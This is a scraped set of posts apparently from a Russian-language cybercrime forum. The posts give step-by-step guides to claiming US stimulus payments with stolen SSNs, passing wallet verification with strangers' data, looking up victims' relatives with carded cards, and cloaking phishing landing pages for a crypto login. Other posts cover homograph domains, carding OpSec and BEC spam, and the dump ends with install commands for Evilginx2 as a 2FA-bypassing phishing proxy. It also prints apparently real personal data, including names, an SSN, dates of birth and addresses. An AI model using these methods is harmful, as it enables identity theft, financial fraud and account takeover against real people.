You must spend at least 10 day(s) on the forum to view the content.

<https://yadi.sk/d/KIwXdkWB3UW2sm>


Пароль к архиву:

You must have at least 10 message(s) to view the content.

От 500 до 1к$ Cash App от USA. Вывод на BTC

Наверняка все слышали, что в штатах раздают гражданам по 500-1200$ в связи с
карантинными мерами. В России была темка по 10к руб выплат, некоторые умельцы
через акки госуслуги абузили и выводили себе на карты...

Суть
Дело было летом, в разгар коронавируса, сейчас возможно будет вторая волна. И
так, сначала нам нужно куда-то принять эти деньги, не будут же они выплачивать
на киви или сбер ��
Был создан и верифнут аккаунт cash.app (типа киви в америке). В CashApp нам
пригодятся эти данные (direct deposit):
Процесс получения $500-1200 есть на офф. сайте правительства, сайт доступен на
русском:

<https://www.irs.gov/ru>
<https://www.irs.gov/coronavirus/economic-impact-payments>

Идем вниз, и жмем на "Получить платеж".

ля получения выплаты нужен номер SSN (для абуза используют чужие), и чтобы
годовой доход был ниже 24.400$ в год, либо наличие детей. Купить SSN можно в
каржевых шопах. Так же могут запросить доп. инфу о том сколько зарабатываешь и
платишь налогов, вводим рандом сумму.
Вводим эти данные и жмем "Continue"

Ждем когда система проверит данные, если все ок, то они попросит данные из
"Direct Deposit" о которых я говорил в начале. Берем их из кэш апп и
вставляем. Ждем несколько дней, и получаем бабос.

Хотел 1200$, но мне скинули только "Child payment" 500$. Теперь можем купить
битков на эти 500$ на Paxful. Создаем аккаунт там и покупаем с помощью
cashapp.
Выбираем предложение и получаем битки.
Ну а дальше меняем биткоин куда вам угодно через bestchange. Я вывел на киви.

Думаю эта тема будет полезной для многих пользователей.
Итак, как получить статус QIWI кошелька "основной".
1\. Открываем сайт реестра залогов. <https://www.reestr-
zalogov.ru/search/index>

2\. Нажимаем на кнопку "Найти в реестре", затем кнопку "По информации о
залогодатели", затем "Физическое лицо".

3\. Теперь вводим рандомную Имя и Фамилию,и нажимаем кнопку "Найти".

4\. Далее мы видим много нужной нам информации.


5\. Далее нажимаем на эти циферки

Далее входим или регистрируем QIWI кошелёк.
Нажимаем ввести данные вручную.
Вводим данные рандомного человека.
Вы получили статус QIWI кошелька "основной".
ИНН сам киви нашел по данным

ИНН человека можно узнать [https://service.nalog.ru/static/personal-
data.html?svc=inn&from=/inn.do](https://service.nalog.ru/static/personal-
data.html?svc=inn&from=%2Finn.do)

Если забанили пишите жалобу на банки.ру



<https://movo.cash/stimulus/>


в теории надо подобрать подходящие Фулки, зарегать на них мово и подать
заявление на сайте указав роутинг и акк номер, если кх выплату еще не получали
то она придёт вам.

Начал заполнять заявление, там в принципе минут 10 уходит, ну я так чисто с
телефона попробовал как проснулся и на второй страницы встрял с каким-то AGI
это связано с такс рефаундом, нужен номер AG
В формах такса есть эти данные!

тема для тех у кого есть доступ к БД сайтов(типа TaxWise,Crosslink и тд) по
TAX выплатам,там всю эту инфу найти можно.Если это нету,то можно покупать
шлакоформы отработанные в 90 процентах случаях.
Если есть доступ к админкам сайтов работадателей,тоже можно найти эту инфу.

подайте простую налоговую декларацию здесь <https://www.irs.gov/> filing /
free-file-do-your-fede - tax -free-free

Генератор fullinfo для саморегов Paypal и пробив авто холдера USA

<https://generatormr.com/full-info#work-box>

>Вы можете бесплатно сгенерировать реальные Full Info(рандом штат)
Пример:
(ALESIA SWANK APT AK-6 120 ELM ST EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
База данных 2017-2018 год

>Сгенерировать МРЗ код/Персональный номер для паспорта США и других
документов.
>Получить инструкцию по Баркодам и их содержимому в Водительских
удостоверениях USA/

Отдельно можно получить бесплатно FULL INFO в телеграмм боте
<https://web.telegram.org/#/im?p=@generatormrfullinfobot>



<https://generatormr.com/full-info#work-box>

>You can generate real Full Info (random) for free)
Example:
(ALESIA SWANK APT AK-6 120 ELM STREET EDGEWATER PARK NJ 8010 158-84-8869
3/1/1988)
Database 2017-2018 year

>To generate SSE code/Personal number for the US passport and other documents.
>Get instructions on Barcodes and their contents in the USA Driver's licenses/

You can also get FULL INFO for free in the telegram bot
<https://web.telegram.org/#/im?p=@generatormrfullinfobot>

Генерирует фулл и ссн! Реальные фулки, из базы какой-то дергает. чекал лично
руками, все валидные, бывает из-за того что такая фулка уже есть и она в
лимите! Если собираетесь использовать их, то пробивайте бг, чтобы получить
более точную инфу!


Пробив MMN, MDOB

MMN - mother maiden name - девичья фамилия матери

MDOB - mother date of birth -датат рождения матери

В США есть интересный сервис-Ancestry.

Сервис позволяет производить поиск родственников/однофамильцев и составлять
гинеологическое древо семей.



Кому как, а нам этот сервис пригодится для другого )

Естественно, сервис не бесплатен-стоит порядка 25 баксов/месяц,но....

К оплате принимаются СС,что очень упростит нам жизнь.



Кроме того, данный сервис предлагает опробовать свои услуги в 14-дневном
пробном (бесплатном) режиме.

Единственным условием для этого является обязательная авторизация суммы,
необходимой для последующей оплаты сервиса.

Именно авторизация, а не снятие

То есть, сумма будет списана только через 14 дней после регистрации, по
окончанию пробного периода.



================================================================



Итак, с теорией разобрались.
Пора переходить непосредственно к практике.



Что нам для этого понадобится:

-ЮСА СС отработка

-Сокс или дед (желательно под штат, но это абсолютно не критично)

-Немного прямые руки и 10-15 минут времени

Дополню сервисами familytreenow.com и whitepages.com
Тоже многое можете найти по родственникам.

================================================================



Приступим.



1) Одеваем носок/заходим на дед и идем на Ancestry.com.

В правой верхней части экрана жмем на кнопку "Start Free Trial".



2) На следующей странице нам предложат выбрать "тариф", а также срок подписки:

\- U.S. DELUXE MEMBERSHIP

\- WORLD DELUXE MEMBERSHIP

Выбираем оптимальный вариант:

WORLD DELUXE MEMBERSHIP (3-Month $27,95/month after trial) и жмем "Continue"



3) Далее нас просят заполнить регистрационную форму-вбиваем Имя/Фамилию
холдера, нашу почту и жмем "Continue"



4) Следущий шаг-продолжаем вбивать свои данные (то есть данные кардхолдера )

Вбиваем Billing-адрес и снова жмем "Continue"



5) Далее переходим к вводу данных СС (здесь думаю все элементарно )

Не забываем согласиться с Условиями Обслуживания и жмем "Start Free Trial"



6) Происходит авторизация карты, ждем.

Еще раз напомню, что сумма не снимается с карты, а только авторизуется



7) Если все ОК, мы попадаем на страницу завершения регистрации.

Здесь указаны наши регистрационные данные (Логин/пасс к акку, а также
информация о оплате)

Естественно, в очередной раз жмем "Continue"



================================================================



Собственно, на этом сам процесс регистрации завершен.

Переходим к поиску интересующих нас данных, а точнее MMN и MDOB.



1) Заходим в расширенный поиск ("Show Advanced")



2) Вводим известные нам данные:

Так как нам известно имя/фамилия холдера, а узнать нам нужно данные его/ее
матери, нас интересуют только поля:



\- Family Member

(выбираем ""Child" и вводим имя/фамилию холдера)



\- Gender

(выбираем "Female", т.к. нас интересует мать холдера)



\- Collection Priority

(выбираем страну, можно оставить без изменений для поиска по всей базе)



Ну и соответственно жмем "Search"



3) Видим результаты поиска



4) Найдя нужного человека, нажимаем "See All information" или на истроку с
наименованием и получаем искомый результат



Иногда поиски затягиваются или не приносят должного результата,

но при должном подходе все затраты времени и сил окупятся с лихвой.
Пробив холдера авто USA

Данные которые использовались в статье:
TIFFANI G MOENCH
DOB: 09/25/70
845 CHELSIE DRIVE, KAYSVILLE, UT 84037

Итак начнем!
Заходим на сайт: <https://www.geico.com/>
вводим ZIP и нажимаем GET A QUOTE:
Далее вводим имя фамилию адрес и доб и жмем NEXT:
И на следующей странице мы видим машины(отображаются не всегда) на данные
которые вбили:

Юзайте клоаку для адв.


Для удобства я возьму хостинг [www.namecheap.com](http://www.namecheap.com)
дешево быстро и фришный ссл независимо от клауда, который при репорте убьет
ваш домен. Таблица с символами уже не доступна, но для вас я ее сохранил.
Для примера возьму домен [www.winminer.com](http://www.winminer.com)

Открывает таблицу и видим символ в Icelandic алфавите **í**

Spoiler: img


копируем и заменяем в нашем домене, получаем так: [www.w](http://www.w)**í**
nminer.com

Spoiler: img



В процессе оформления на этой странице выбираем язык символа:

Spoiler: img

/SPOILER]

Таблица:

Таблица:

### [ Where does IDN apply | Speednames ](http://web.archive.org/web/20160602184949/https://www.speednames.com/idn-list)

web.archive.org



You must have at least 77 reaction(s) to view the content.

ищу партнера.с аками даной плошадки

Подскажите актуальные шопы cc, и если есть инвайт буду благодарен. Можно в пм.

Всем привет!
Вы уже наверно слышали про сайт Honeygain.com
​

Spoiler: Что такое Honeygain.com

Вот гугловский перевод.

Что такое Honeygain?
Honeygain - это краудсорсинговая сетевая компания,
которая позволяет другим компаниям проводить аналитические, рыночные и бизнес-
исследования.

Что делает приложение Honeygain?
Это безопасно? Приложение предоставляет прокси-сервисы третьим лицам, таким
как специалисты по данным,
Fortune 500 и другие заслуживающие доверия компании. Это безопасно? Да! Ваша
безопасность важна для нас.
И поскольку пчелиная матка знает своих пчел, мы знаем, для чего каждый партнер
использует свою сеть.

Безопасны ли мои персональные данные с Honeygain?
100%. Мы не храним никаких данных наших клиентов. Единственные данные, которые
мы будем иметь, это то,
что будет необходимо для сервиса. Это включает в себя ваш адрес электронной
почты, ваш IP-адрес,
сколько трафика вы делаете в месяц и выбранные вами способы выплаты.

Как рассчитывается мой платеж?
Вы зарабатываете кредиты за каждый введенный вами килобайт данных, и,
собрав достаточное количество кредитов, вы можете конвертировать их в доллары
США.

How credits convert to USD?
10 credits are equal to 0.01USD (1 cent USD)

Каковы ваши лучшие места?
У нас нет лучших мест - у Honeygain есть покрытие по всему миру.

Есть ли приложение для Windows?
Да! Мы запустили приложение для Windows! Теперь вы можете Honeygain
на вашем рабочем столе! Получи это [здесь](https://r.honeygain.money/TIMBOBBE)

Работает ли Honeygain на Wi-Fi и мобильных данных?
Да, Honeygain работает как на Wi-Fi, так и на мобильных данных.
Мобильные данные должны быть включены в настройках приложения.

Какова минимальная выплата?
Минимальная выплата составляет 20 долларов США.

Какова текущая ставка выплат?
Вы получаете 1 кредит за 10 МБ трафика, проходящего через вас. Таким образом,
за 10 ГБ вы заработаете 1 доллар США.

Какие способы выплат доступны в настоящее время?
В настоящее время мы поддерживаем платежи через PayPal, но скоро появятся
новые возможности!

Есть ли способ увеличить мой заработок?
Все просто - установите Honeygain на большее количество устройств и подключите
устройство к сети (работа, дядя или ваш дом).
Это поможет вам максимально увеличить ваши потенциальные выплаты. (Лучше
всего, когда уникальный IP-адрес имеет не более 3 устройств)

На каких сетях работает Honeygain? Что означает ошибка «Сеть недоступна»?
Honeygain поддерживает только ваши домашние и мобильные сети (IP-адреса). Если
вы подключены к сети другого типа (IP-адрес),
вы увидите следующую ошибку «Сеть неработоспособна», и приложение будет
остановлено, пока вы не подключитесь к соответствующей сети.

На скольких устройствах я могу использовать Honeygain? Что означает ошибка
«Перегрузка сети»?
Вы можете использовать до 3-х устройств в одной сети (IP-адрес) одновременно,
но чтобы получить максимальный доход,
у вас должно быть 1 устройство на IP-адрес. Дополнительные устройства,
подключенные к этой сети,
будут приостановлены и будут отображать ошибку «Network Overused» до тех пор,
пока не уменьшится количество активных устройств.
В целом, мы не ограничиваем количество устройств, подключенных к вашей учетной
записи - если вы хотите использовать 100 устройств,
вы можете, но вы должны подключить их как минимум к 20 различным сетям (по 3
устройства в каждой).

Сколько данных использует Honeygain?
Вы можете рассчитывать на использование до 2 ГБ в день, хотя учтите, что в
зависимости от скорости вашей сети мы можем достичь максимум 15 ГБ в день.

Могу ли я защитить себя от использования всего моего тарифного плана?
Да. Вы можете сделать это, просто отключив использование мобильных данных в
меню настроек приложения Honeygain.
Или, если в Windows - щелкните правой кнопкой мыши значок Honeygain bee и
выберите «выйти», чтобы выключить приложение.

Могу ли я установить предупреждение о том, сколько данных я использую?
Если вы используете версию нашего приложения для Android, мы рекомендуем
использовать уведомления об использовании данных Android.
Что касается пользователей Windows, в настоящее время мы работаем над
решением.

Могут ли мои кредиты истечь?
Обычно нет. Если вы активный пользователь, срок действия ваших кредитов не
истечет.
Однако срок действия кредитов Honeygain истекает через 6 месяцев после того
дня, когда вы были активны в последний раз.

Как я могу связаться с вами?
Не стесняйтесь обращаться к нам через контактную форму нашего сайта!

У вас есть реферальная программа?
Да! Вы можете пригласить своих друзей с помощью персонализированной ссылки, и
10% их ежедневного заработка будет добавлено на ваш счет!

Как долго мне нужно ждать выплаты?
Продолжительность выплаты зависит от выбранного вами типа оплаты и вашего
местоположения.
Для платежей PayPal они должны быть обработаны в течение 24 часов.

Могу ли я использовать Honeygain, если я несовершеннолетний?
Законный возраст зрелости зависит от страны, в которой вы живете, поэтому мы
советуем вам убедиться, что это такое.
Если вы несовершеннолетний, вам может потребоваться разрешение ваших родителей
или опекунов на использование Honeygain.

Как узнать, что приложение работает?
Если вы используете Android, вы увидите небольшое зеленое уведомление на
панели уведомлений.
В Windows просто наведите курсор мыши на маленький значок пчелы на панели
уведомлений.

Будет ли работать Honeygain, если я использую VPN?
Нет, мы не поддерживаем IP-адреса сетей VPN или Datacenter.

Что произойдет, если я выключу свой Wi-Fi или Wi-Fi будет недоступен?
Приложение автоматически остановится и будет ждать, пока оно не сможет снова
подключиться к сети.

Будет ли использование сети Honeygain мешать моему повседневному использованию
данных?
Вы не должны чувствовать никакой разницы с нашим приложением, работающим в
фоновом режиме.
Мы настроили наше приложение так, чтобы оно никогда не использовало более 10%
доступной пропускной способности сети.

Использует ли приложение больше батареи?
Да, пока активно разделение трафика, приложение использует батарею устройства.
В зависимости от возраста вашего устройства ожидаемое потребление может
варьироваться от 5% до 8% батареи в день.

​


​

Honeygain ставим на дедик и получаем $. Сайт использует твой интернет как
прокси. За это платит в $ на ПайПал. По реферальной ссылке дают 5$ на счёт,
без реферальной будешь зарабатывать с нуля, как я. Я нашёл прогу на серваке,
ну и зарегался. другу кинул свою реферальную ему дали 5$.
Реферальная: [тык](https://r.honeygain.money/TIMBOBBE)
Не реферальная: [тык](https://dashboard.honeygain.com/)

Начнем зарабатывать немного кэша,а не 10 центов в день как у других получается

1\. Регистрируемся на сайте
Реферальная: [тык](https://r.honeygain.money/TIMBOBBE) \- 5 $ получите сразу
на свой счет в личном кабинете,для вывода останется накопить 15 $
Не реферальная: [тык](https://dashboard.honeygain.com/)

2.Скачиваете официальный софт с сайта Honeygain
[скачать](https://www.honeygain.com/download)


3.Скачиваем бот+ исходники в архиве [CLIKE]

You must have at least 2 reaction(s) to view the content.

[/CLIKE]

4.После того как все скачали,устанавливаем софт из пункт 2
Путь установки не меняем,обычно путь такой C:\Users\Имя вашего
пользователя\AppData\Roaming\Honeygain\
если программа при запуске пишет![Новый точечный
рисунок.jpg](https://xss.is/attachments/8816/)


типо не поддерживаемая сеть или ![Новый точечный
рисунок.jpg](https://xss.is/attachments/8817/)
если программа работает то оставляем работать,если нет то читаем далее,на
многих дедиках у меня эта
софтина не хотела работать,продолжим

5.Выходим из Honeygain приложения, и запускаем бот из Honeygain Bot Free.exe
из папки Honeygain Bot Free
либо компилируете сами,исходники также прикладываю в архиве
бот выглядит так
6.Переходим в личный кабинет <https://dashboard.honeygain.com/>
кликаете правой кнопкой мыши в любом месте и нажимаете "Просмотреть код" или
Ctrl+Shift+I

7.Нажимаем вкладку Network (1)
(2)balance
(3) Headers
и листаем вниз до надписи authorization:

выделяем все после двоеточия
authorization:
все что ниже выделяете у себя
пример:

8.Копируем все выше выделенное(это ваш токен авторизации) и вставляем сюда
**Line token** оставить пустым
**Tread **больше 2 не ставить(количество одновременно запущенных копий
программ) на официальном сайте написано
что больше 3 устройств на одном ip адресе снижают скорость и заработок тоже
соответственно
**Delay** оставьте по умолчанию 300
**Autorun**(автозапуск бота) можете включить по желанию
**Limit** (количество переданных гигабайт) ставьте любым,естественно чем
больше тем лучше

ну и после очень ~~сложных~~ простых настроек нажимаем ![Новый точечный
рисунок.jpg](https://xss.is/attachments/8824/)
курим 5 секунд,и можете запускать нажатием кнопки Start нашу уже пропатченную
софтину ,она запустится автоматически,в трее появится иконка пчелки
мой пример как выглядит так, у вас здесь будет по 0 ,вы же только начали
работать

далее окно для ввода вашей почты и пароля который вы указывали при регистрации
их вводить сюда


нажимаем логин,софт работает,минуты через 2 проверяем количество баллов и
количество переданых мегабайт,если пусто, ждем,не факт что ip вашей страны
будет востребован сразу,но он будет поверьте!

В дальнейшем можно запускать софт и без бота,программа уже пропатченна,у
программы находящиеся в папке \AppData\Roaming\Honeygain\ снизится вес,это
нормально не пугайтесь.
Можно сделать портабл версию,копируете папку Honeygain отсюда
\AppData\Roaming\Honeygain\ и можете запускать на других ПК,файл
HoneygainUpdater лучше удалить,ибо программа будет постоянно проверять
обновления и если обновится,то весь патчинг слетит и придется делать все
заново!


P.S
Из моих личных наблюдений скажу сразу,страны азиатского контингента менее
востребованы чем Европа или USA,
лично на одном из дедиков с немецким ip, у меня за один день прошло трафика 15
гигов,хороший спрос естественно на такие страны как
Америка,Канада,Великобритания,Германия,Франция,Италия,Испания,но это не значит
что не надо пробовать другие страны,что касается нашей необъятной страны
России,то в день максимум был спрос 3-5 гигов,иногда и вообще 200-300 Mb .
Заметил странное снижение трафика перед набором минималки в 20 баксов,но после
выплаты все снова стало зае..сь!
Выплата приходит в течении 1-2 дней,бывало и через 5 часов

Минималку на выплату я набирал по разному ,бывало и за 3-4 дня , бывало и 1-2
недели
Количество постоянно работающих дедиков в 15-30 штук приносят примерно около
3-4 баксов в день,еще раз повторюсь зависит все от ip страны дедика и от
количества пропускной способности(желательно 1ГБ но и со 100 Mb тоже пойдет)

На своем домашнем ПК или телефоне с андроидом(для ios приложения нет) можете
смело ставить программу,по вирустоталу файл чистый,ip за все время моего
использования в черные базы не попал,все таки они дорожат своей репутацией ибо
потеряют клиентов!

Немножко пруфов











Надеюсь объяснил подробно,все удачного заработка!И не верьте в бред которые
пишут люди про заработок 4 цента в сутки!
Всем здоровья и удачи!

So I’m a professional Spammer and have a lot of experience in BEC . Im
creating this thread to talk about anything related to bec . Anyone feel free
to ask any question I will answer being the most blunt possible.

слитый курс от wwh



You must have at least 5 message(s) to view the content.

**MY ENGLISH IS PURE CHAOS SO FORGIVE ME THAT,WARNING AFTER READING YOU CAN BE
MORE CONFUSED NOT FROM INFORMATIONS BUT FROM MY CUSTOM ENGLISH,
MADE BY BACKSTAB,EVERYTHING IS WRITTEN BY MYSELF,NOTHING ON THIS POST i NOT
COPY/PASTE FROM ANOTHER SOURCE,ENJOY**

because people share knowledge and users help each other so I want too bring
something useful to community and its be just my experience and knowledge
please don't expect any methods I just want update some information what you
could find in guides

_also I am not expert there I just want help and share my experience
i know we cannot share together working methods because its be fast burned but
i think people must have valid information from which can learn so lets go
start_
\----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
**Carding is not same like vendors,scammers present to You
a lot information what you could find on clear net or even on other forums is
outdated**
\----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
**1\. EASY/SIMPLE BASIC INFORMATION**

**Few example what I found on outdated or even forums,guides**

**-_use Firefox and extension ( for example to load PayPal account with
cookies )_**
that's was probably work few years ago but now its anti-fraud system more
better and extension could be detected
anyways Mozilla Firefox have high Spyware level so I think its not safe like
people say


**-_use Virtual Machine_**
again that's was probably work few years ago but now its can be again detected
( check attach file to proof my information )
**also its you can setup VM to not be detected but that 's nobody cannot know
when people don't tell you that **
_also maybe a lot people don 't know how dangerous is Mozilla Firefox ( check
attach file to proof my information )
you can easily solved use arkenfox **(<https://github.com/arkenfox/user.js> )


**_


**_I can continue more because there is many things but I don 't want waste
your time and I just want proof my information_**
_**don 't forget check attachment **_

\----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
I remember times when people on Carding groups on Telegram don't care about
security and OpSec everyone want just fast money but nobody want learn
so let me tell you few basic problem with carding and payments what people
have
\----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
**1 - CARD IS DEAD**
**2 - BAD PROXY**
**3 - BAD SETTING/SETUP**
\----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
**_1 - CAN BE EASILY SOLVED OVER VERIFIED CHECKER FOR CARDS
2 - ITS MORE COMPLICATED FOR THIS REASON CHECK _******_( check attach file to
proof my information )_**
a) You must always check anti-fraud score under 0-20 is okay that was you see
on screenshot its bad and never works for payment
b) DNS LEAK MUST MATCH WITH ISP
EXAMPLE : COMCAST CABLE ( SOCKS5 ) MUST HAVE COMCAST CABLE ( DNS ) THAT'S
CORRECT
COMCAST CABLE ( SOCKS5 ) HAVE GOOGLE OR ANOTHER DNS IS WRONG AND AGAIN NEVER
WORK PROPERLY FOR PAYMENTS
**



**_3 - ITS MOST COMPLICATED AND ITS BE VERY HARD FOR ME DESCRIBE AND EXPLAIN
WHAT I CURRENT MEAN_**

Now i don't want immediately jump how properly setup your device but I want
write my theory with some examples ( some information can be repeated )

**-** like i said its most complicated thing and for me its hard describe in
this post but let me start from begin
when i was start with carding i was read guides where vendors write "use
Firefox and use extension" now we know its bad because its can be detected

_**for example do you know what is device fingerprints or even browser
fingerprints/canvas fingerprints
do you know webGL could detect your GPU ? **_
_**do you know TCP/IP could detect your real OS ? ( so when spoofing from
Linux to Windows over some anti-detect browser TCP/IP could be problem )**

i am pretty sure some things you don't know before that you read this and
don't worry its not reason to be shamed,
this problematic about browser I be explain more and when you have over 20
reactions on your account you can check it _


**_\- many people tell you use RDP and there can be again some problem because
many vendors sell VM RDP and that 's real problem_**
be honest i know how its be flustered why payments not work and you just read
again outdated guides and think what you was doing wrong

now be honest and buy physical RDP can be for many us problem and expensive as
hell,so for this reason I was start from begin and that was download Linux and
try hack owns RDP
because my theory is carders want fast and easy money but they don't start
from begin but somewhere from middle

_simple who hack RDP ( hackers ) vendors just sell they_
_who phish cards ( phishers ) and again vendors many times don 't have any
idea how use they just sell _

so I think its perfect and fine to download some Linux and start from begin
and try hack own RDP or even get some experience about phishing

now another example many scammers sell **method+bin** but let me tell you
secret and that's every site is cardable You need always just non-vbv bin
but also I want say its can be true and some sites is more hard to card than
others

now my personal experience when I was bought gift cards
on sites egifter,dundle I maked purchase 50$ Steam gift card and after I try
bought another they want DL FRONT+BACK ( maybe selfie ) what must match with
victim on card and for that i was not ready

so that's another problem You was come to do carding and you never think about
( like make digital DL over photoshop and PSD templates )
and be honest that's fucking hell because every state in USA have different
PSD template and different PDF417 barcode

Yes i know its better ways how cash out card but everyone tell you buy gift
cards or even crypto ( its same difficult )
simple to say I recommend to use android phone rooted,custom rom and etc

**\- FLASH TWRP
\- CUSTOM ROM WITHOUT GAPPS
\- FLASH MAGISK
\- MOST IMPORTANT IS USE XPOSED MODULES


**2\. EXAMPLE OF CARDING/** BASIC INFORMATION **

You must have at least 10 reaction(s) to view the content.

1) <https://www.getcopper.com/> \- карта как greenlight, для тинейджеров,
можно линкануть и ба и карту, депать с них деньги. Можно так же создать
ребенка и слать ему.





2) <https://sentpaid.com/> \- paypal инвойсы, неординарный подход ?





3) <https://www.northone.com/> \- бизнес банк, что с ним делать, поймут только
те, кто работает с регистрацией ллсишек и так далее.

Как и обещал.
Привет славпох с 2016
>>>>>>>>>>> _Подготовка арсенала._
Первое что вам нужно, это клоака. Это некий фильтр от ботов и модераторов. Как
это работает: Если модератор зашел на ваш ленд который вы клоачите, то ему
покажет _white.html_ и тем самым он не попадет на ваш фейк и даст апрув по
линку. Так же есть гео фильтр, тут думаю все понятно.

Очень важный момент, что бы апрув РК прошел по маслу, пишите прокладку aka
white.html с нуля! Это может быть поставка паленых колонок jbl партиями через
тайланд в школу на день учителя.
Если вашу РК отклонили или акк ушел в бан, берите новый домен и пишите новую
прокладку!

Нам понадобится 2 домена:
1-й домен для прокладки aka white.html
2-й домен для вашего фейк\ленда ( в моем случаи в пример взят https: // login
. blockchain . com /#/login )

_white page_ / _вп_ / _белая страница_ / _прокладка_ \- это страница которая
будет показываться модераторам или ботам.
_offer page_ / _блек пейдж_ - это страница, на которую будет кидать юзеров.

Я рекомендую взять >**[ТУТ](http://hide.click/)<** тестовый период на 7 дней
для начала. Для примера возьму линк https: // login . blockchain . com
/#/login


Spoiler: Настройка с иллюстрациями



Все, ваша клоака настроена и готова к бою! Начнем все загружать.

>>>>>>>>>>> _Загружаем_.
1\. Берем первый домен и хост офк который мы и будет сувать в рекламный
кабинет,он же и есть клоака.

Spoiler: Файлы white.html + клоака. Клоака index.php



Грузим это все на ваш первый домен и все готово, желаю удачи в начинаниях.

p.s к сожалению не смогу часто отвечать на ваши вопросы в связи с личными
проблемами.

Usus est optimus magister (лат. Опыт - лучший учитель)
В этой теме делимся негативным опытом обитания в сети. негативный опыт тоже
опыт и каждого из нас хоть раз да обманывали и пытались вытрясти деньги.
Вообщем все когда то были ламаками и верили что "наш ICQ цветок станет синим".
Я тоже отосплюсь и расскажу набор своих историй из личного опыта.

Думаю тема будет полезна тем, кто до сих пор попадается на все это дело.
Вообщем поехали.

Не давно в сети появился новый способ развода - по внутренней почте wm
keeper'a.
По внутреней почте приходит сообщение такого рода:


Code:Copy to clipboard



Поздравляем, вы выиграли в акции "Двойной баланс"!
С 2006г. по 2007г. каждый месяц Webmoney Transfer проводит различные акции. По ст.5.1 п.10 о соглашении Webmoney Transfer, компьютер случайным образом выбирает один WMID, который и станет победителем в той или иной акции.
В данном случае компьютер выбрал ваш WMID и вы стали призером акции "Двойной баланс".
Вы можете удвоить свои титульные знаки на любом из WMZ, WMR или WME
кошельке.

Для этого вам нужно:
Выбрать (см. внизу) один из вариантов, который вам больше подходит
В открывшемся окне ввести сумму, которую вы хотите удвоить (сумма должна быть не более, чем сумма на выбранном вами кошельке с учетом комиссии 0.8%)
Нажать продолжить



Выберите, какие титульные знаки хотите удвоить:
1. Умножить WMZ в 2 раза
2. Умножить WMR в 2 раза
3. Умножить WMU в 2 раза
4. Умножить WME в 2 раза

Примечание:
* баланс удваивается моментально.
* Удвоить можно только 1 раз.


[Скриншот|Screenshot](http://i69.photobucket.com/albums/i54/gikshu/Untitled-1.gif)

HTML код данной страницы выглядит так:

Code:Copy to clipboard



<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style>
A {
COLOR: #1f4790; FONT-FAMILY: verdana, helvetica, sans-serif; TEXT-DECORATION: none
}
A:hover {
COLOR: #1f4790; FONT-FAMILY: verdana, helvetica, sans-serif; TEXT-DECORATION: underline
}
</style>
</head>
<body bgColor="#ffffff" leftMargin="3" topMargin="0" marginheight="0" marginwidth="0">
<table cellSpacing="0" cellPadding="0">
<tr>
<td>
<A href="http://www.webmoney.ru/" target="_blank"><IMG height="80" hspace="10" src="http://www.webmoney.ru/img/logo_wm.gif" width="170" border="0"></A>
</td>
</tr>
<tr>
<td align="center">
<font style="font-family: verdana, arial, helvetica, sans serif; color:#1f4790; font-size:13px;"><b>Поздравляем, вы выиграли в акции "Двойной баланс"!</b></font>
</td>
</tr>
<tr>
<td align="justify"><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:12px;">
С 2006г. по 2007г. каждый месяц Webmoney Transfer проводит различные акции.
По ст.5.1 п.10 о соглашении Webmoney Transfer, компьютер случайным образом выбирает один WMID, который и станет победителем в той или иной акции.

В данном случае компьютер выбрал ваш WMID и вы стали призером акции "Двойной баланс".

Вы можете удвоить свои титульные знаки на любом из WMZ, WMR или WME кошельке.


Для этого вам нужно:
<li>Выбрать (см. внизу) один из вариантов, который вам больше подходит
<li>В открывшемся окне ввести сумму, которую вы хотите удвоить (сумма должна быть не более, чем сумма на выбранном вами кошельке с учетом комиссии 0.8%)
<li>Нажать продолжить



</font>
</td>
</tr>
<tr>
<td><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:12px;">
Выберите, какие титульные знаки хотите удвоить:

1. <a href="wmkayto?Purse=Z653442206739&Desc=Умножение WMZx2&BringToFront=Y">Умножить WMZ в 2 раза</a>

2. <a href="wmkayto?Purse=R425160807968&Desc=Умножение WMRx2&BringToFront=Y">Умножить WMR в 2 раза</a>

3. <a href="wmkayto?Purse=U365215950008&Desc=Умножение WMUx2&BringToFront=Y">Умножить WMU в 2 раза</a>

4. <a href="wmkayto?Purse=E473564454543&Desc=Умножение WMEx2&BringToFront=Y">Умножить WME в 2 раза</a>
</font>
</td>
</tr>
<tr>
<td><font style="font-family: verdana, arial, helvetica, sans serif; color:#444444; font-size:10px;">

Примечание:

* баланс удваивается моментально.

* Удвоить можно только 1 раз.
</font>
</td>
</tr>
</table>
</body>
</html>


Спам идёт с разных WMID поэтому засечь конкретный WMID мошеника нельзя
[Подробнее в
Арбитраже...](http://forum.webmoney.ru/Default.aspx?g=posts&m=13880)

You must have at least 250 reaction(s) to view the content.



Вопросы задавать сюда
На самом WWH:

> > Полная стоимость 60.000 рублей.
> Обязательно иметь на материал 200 USD.(12.000)
>>

>> Click to expand...

>
> Click to expand...



> Тема будет дополняться в период до конца обучения
> Запрещено сливать хайд на форумы
>
> Click to expand...

В архиве 2 папки - eth and btc. Используйте что хотите.


You must have at least 30 message(s) to view the content.

Evilginx2 - тула для фишинга от kgretzky. Киллер фича - это возможность
забайпасить 2-fa. Для пользователя страница выглядит абсолютно идентично
оригинальной, так как по факту это оригинальная страница и есть. Весь код
страницы проксируется через nginx, а прокси подменяет все урлы которые есть в
теле ответа, на урлы контролируемого домена, за счет чего все кнопки работают
корректно, но редиректят на наш сервер.

Первая версия Evilginx была тоже хороша
<https://github.com/kgretzky/evilginx>, но недостатками была сложность
установки и конфигурирования, в результате сейчас проект не поддерживается, и
многие конфиги не работают, хотя только на первой версии проекта у меня
получалось допилить applied конфиг до рабочей версии, могу выпустить отдельный
пост про это.

Прелесть второй версии в том, что все работает в докере, что убирает весь
геморрой с конфигурированием, и оставляет нам править простецкий yml файлик

Список поддержвиаемых сервисов для фишинга, из коробки, впечатляет:


И так в посте покажу процес установки и разворачивания:

* Покупаем домен и vps
* Настраиваем ns запись на свою VPS (Может занят до суток)

**Установка:**

Code:Copy to clipboard



curl https://get.docker.com/ | bash
git clone https://github.com/kgretzky/evilginx2
